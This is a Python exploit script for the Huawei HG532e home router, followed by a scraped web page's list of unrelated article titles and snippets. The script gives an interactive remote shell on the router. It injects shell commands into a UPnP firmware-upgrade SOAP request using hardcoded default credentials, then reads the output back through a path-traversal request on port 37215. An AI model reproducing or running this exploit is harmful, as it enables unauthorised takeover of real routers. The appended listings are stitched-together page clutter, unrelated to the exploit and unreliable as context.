#!/bin/python

'''

    Author : Rebellion

    Github : @rebe11ion

    Twitter : @rebellion

'''

import urllib2,requests,os,sys

from requests.auth import HTTPDigestAuth

DEFAULT_HEADERS = {"User-Agent": "Mozilla", }

DEFAULT_TIMEOUT = 5

def fetch_url(url):

    global DEFAULT_HEADERS, DEFAULT_TIMEOUT

    request = urllib2.Request(url, headers=DEFAULT_HEADERS)

    data = urllib2.urlopen(request, timeout=DEFAULT_TIMEOUT).read()

    return data

def exploit(ip, path):

    url = "http://%s:37215/icon/../../../%s" % (ip, path)

    data = fetch_url(url)

    return data

def main():

    pwd = "/"

    cmd_path = "/tmp/ccmd"

    pwd_path = "/tmp/cpwd"

    while True:

       targetip = sys.argv[1]

       cmd_ = raw_input("[{}]$ ".format(pwd))

       cmd = "cd {} ; {} > {} ; pwd > {}".format(pwd,cmd_.split("|")[0],cmd_path,pwd_path)

       rm = "<?xml version=\"1.0\" ?>\n    <s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n    <s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\">\n    <NewStatusURL>$(" + cmd + ")</NewStatusURL>\n<NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL>\n</u:Upgrade>\n    </s:Body>\n    </s:Envelope>"

       url = "http://192.168.1.1:37215/ctrlt/DeviceUpgrade_1"

       requests.post(url, auth=HTTPDigestAuth('dslf-config', 'admin'), data=rm)

       assert cmd_path.startswith("/"), "An absolute path is required"

       data = exploit(targetip, cmd_path)

       open(cmd_path,"wb").write(data)

       if "cd" in cmd_:

          pass

       elif "clear" in cmd_:

          os.system("clear")

       elif "cat" in cmd_:

          os.system(cmd_.replace(cmd_.split("cat")[1].split(" ")[1],cmd_path))

       else:

          if "|" in cmd_:

             os.system("cat {} | {}".format(cmd_path,cmd_.split("|")[1]))

          else:

             os.system("cat {}".format(cmd_path))

       pwd = exploit(targetip,pwd_path).strip("\n")

if __name__ == "__main__":

    main()

[EXP]Huawei Router HG532e - Command Execution的更多相关文章

  1. [EXP]Apache Spark - Unauthenticated Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  2. [EXP]Jenkins 2.150.2 - Remote Command Execution (Metasploit)

    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://gith ...

  3. struts2 CVE-2012-0392 S2-008 Strict DMI does not work correctly allows remote command execution and arbitrary file overwrite

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  4. PowerShell vs. PsExec for Remote Command Execution

    Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...

  5. struts2 CVE-2010-1870 S2-005 XWork ParameterInterceptors bypass allows remote command execution

    catalog . Description . Effected Scope . Exploit Analysis . Principle Of Vulnerability . Patch Fix 1 ...

  6. MYSQL报Fatal error encountered during command execution.错误的解决方法

    {MySql.Data.MySqlClient.MySqlException (0x80004005): Fatal error encountered during command executio ...

  7. My SQL和LINQ 实现ROW_NUMBER() OVER以及Fatal error encountered during command execution

    Oracle 和SQL server都有ROW_NUMBER() OVER这个功能函数,主要用于分组排序,而MySQL 却没有 SELECT * FROM (SELECT ROW_NUMBER() O ...

  8. JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution

    CVE ID : CVE-2019-7727 JMX/RMI Nice ENGAGE <= 6.5 Remote Command Execution description=========== ...

  9. Fatal error encountered during command execution

    MySQL + .net + EF 开发环境,调用一处sql语句报错: Fatal error encountered during command execution[sql] view plain ...

随机推荐

  1. 652. Find Duplicate Subtrees找出重复的子树

    [抄题]: 就是出现了多次的子树,可以只包括一个点. Given a binary tree, return all duplicate subtrees. For each kind of dupl ...

  2. hbase总结~hbase配置和使用

    Base配置和使用文档......................................................................................... ...

  3. thinkphp 视图(三)系统变量——原生标签

    查看系统变量 dump($_SERVER); 在view中获取服务器变量 <p>{$Think.server.HTTP_HOST}</p> 获取env变量 status=dev ...

  4. ASP.NET CORE 2.0 发布到IIS,IIS如何设置环境变量来区分生产环境和测试环境

    0.前言 因为给前端的测试环境是windows,所以要设置windows上的环境变量,如果上Linux就没有这篇文章了,所以大家不要在意为什么core不放在linux上. 1.网上的解决方案 a 方式 ...

  5. Java并发集合(一)-CopyOnWriteArrayList分析与使用

    CopyOnWriteArrayList分析与使用 原文链接: http://ifeve.com/java-copy-on-write/ 一.Copy-On-Write Copy-On-Write简称 ...

  6. b2b b2c o2o电子商务微服务云平台

    大型企业分布式互联网电子商务平台,推出PC+微信+APP+云服务的云商平台系统,其中包括B2B.B2C.C2C.O2O.新零售.直播电商等子平台. 根据微服务化设计思想,结合spring cloud一 ...

  7. list(zip(*querySet))使用

    teacher_cls_list = obj.cls.all().values_list('id', 'caption') #list(zip(*list)),将数组中的元组中的每一项取出,添加到一起 ...

  8. Python中添加中文注释报错SyntaxError: Non-UTF-8 code starting with '\xc1'

    问题:在文本编辑器中编辑Python文件时添加中文注释,运行python文件时报错.SyntaxError: Non-UTF-8 code starting with '\xc1' 解决方法:在文本开 ...

  9. tensorflow学习之(二)Seesion的两种打开模式

    #Seesion的两种打开模式 import tensorflow as tf matrix1 = tf.constant([[3,3]])#一行两列的一个矩阵 matrix2 = tf.consta ...

  10. Ubuntu 18.04 Server上安装LAMP

    由于要进行渗透测试,所以这两天就在搭LAMP的环境(过程及其痛苦) 这里分享一些我遇到的问题. 首先介绍一下我的使用环境  VM虚拟机,ubuntu 与主机NAT连接 由于之前一直使用的是kali(默 ...